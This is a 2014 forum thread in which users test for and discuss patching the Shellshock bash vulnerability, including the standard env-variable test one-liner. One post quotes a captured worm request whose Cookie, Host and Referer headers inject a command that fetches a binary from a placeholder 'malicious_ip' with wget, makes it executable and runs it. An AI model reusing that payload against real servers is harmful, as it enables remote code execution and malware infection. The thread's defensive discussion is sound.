Shellshock??

Edward78 · 26 Sep 2014 at 16:47

Info, I checked & did a version check.

edward78@edward78-System-Product-Name ~ $ env x='() { :;}; echo vulnerable' bash -c 'echo hello'
vulnerable
hello
edward78@edward78-System-Product-Name ~ $ bash --version
GNU bash, version 4.2.45(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

So it says, If you get version 3.2.51(1)-release as a result, you'll need to update. I have 4.2, but I am vulnerable it says.

handofbod · 26 Sep 2014 at 16:57

So did you update? I ran the test and got a vulnerable return, did an update and it was fixed.

I also heard that it's not as big an issue as people were making out.

Rroff · 26 Sep 2014 at 17:01

Disagree on it not being a big issue - from what I can make out if you get access to the web based control panel on some servers, network hardware, etc. you can potentially exploit features on that if they execute a script or command to do whatever they do to execute commands at the same level as the associated user.

Edward78 · 27 Sep 2014 at 05:09

handofbod said:
So did you update? I ran the test and got a vulnerable return, did an update and it was fixed.

I also heard that it's not as big an issue as people were making out.

Yes.

memyselfandi · 27 Sep 2014 at 06:09

Edward78 said:
So it says, If you get version 3.2.51(1)-release as a result, you'll need to update. I have 4.2, but I am vulnerable it says.

That'll because 4.2 is, and always has been, known to be vulnerable as well.

As to how important it is .... all I can say is opinion does differ. All I can say is that where I work we are treating it as an urgent issue, whereas some of our sister teams in other parts of Europe do not agree ... But that's not stopping us sorting out many of the systems we look after in the UK.

mortals · 27 Sep 2014 at 12:02

I updated my servers twice (when they pushed each of the bash updates)

I think it is a pretty big deal considering it can allow code execution with root access.
It's already been utilized by botnet/worm developers and is going through the net.

It also effects IBM z/os which could be a huge problem as they might not get updated.

here is an example of the bot/worm hitting a server:

GET./.HTTP/1.0
.User-Agent:.Thanks-Rob
.Cookie).{.:;.};.wget.-O./tmp/besh.http://malicious_ip/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Host).{.:;.};.wget.-O./tmp/besh.http://malicious_ip/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Referer).{.:;.};.wget.-O./tmp/besh.http://malicious_ip/nginx;.chmod.777./tmp/besh;./tmp/besh;
.Accept:.*/*

I'm sure any of you who know bash/linux can see what's going on here

Frozennova · 27 Sep 2014 at 13:28

What's the shell script they're executing?

mortals · 27 Sep 2014 at 14:51

Frozennova said:
What's the shell script they're executing?

It downloads, chmod's and executes a binary payload.

The payload is completely undetected at the moment (virustotal)

Frozennova · 27 Sep 2014 at 15:48

Ahh, I was expecting the binary payload to be a shell script. Binary payload makes it even worse then.

Thankfully my only Internet facing server is secure against it

Rroff · 27 Sep 2014 at 15:52

Frozennova said:
Ahh, I was expecting the binary payload to be a shell script. Binary payload makes it even worse then.

Thankfully my only Internet facing server is secure against it

Worse case you can execute any bash command at the elevation of the host user - which means that you can pretty much do anything that user can including downloading remote files, if that user has root privileges, poor security, you can guess the SU password or know of flaws in that OS to get full access you can do pretty much anything.

I've not played with it much but I'm guessing any web control panel that has a feature using unfiltered text input and drops back directly to the script host to execute a command or script using that input could potentially be exploited.

leoncuprar · 3 Oct 2014 at 22:28

Its been a right pain for me the last week patching over 60 Linux servers of various flavours.. more so because a lot of them are in the States and organising reboots was a pain with the time difference...Why the hell our architecture team chose Ubuntu I don't know ... not an enterprise O/S in my opinion...

Casdawer · 6 Oct 2014 at 14:58

This is causing a major headache for me too.

Got about 1000 servers that need this patched all in different countries too!

Going to be one of those weeks!

On Holiday · 6 Oct 2014 at 15:16

melvis · 6 Oct 2014 at 19:53

it all depends on your stack as far as i can tell, if you allow CGI, tomcat, or allow system calls through php-fpm then your basically screwed (without the patch), otherwise its much less of an issue.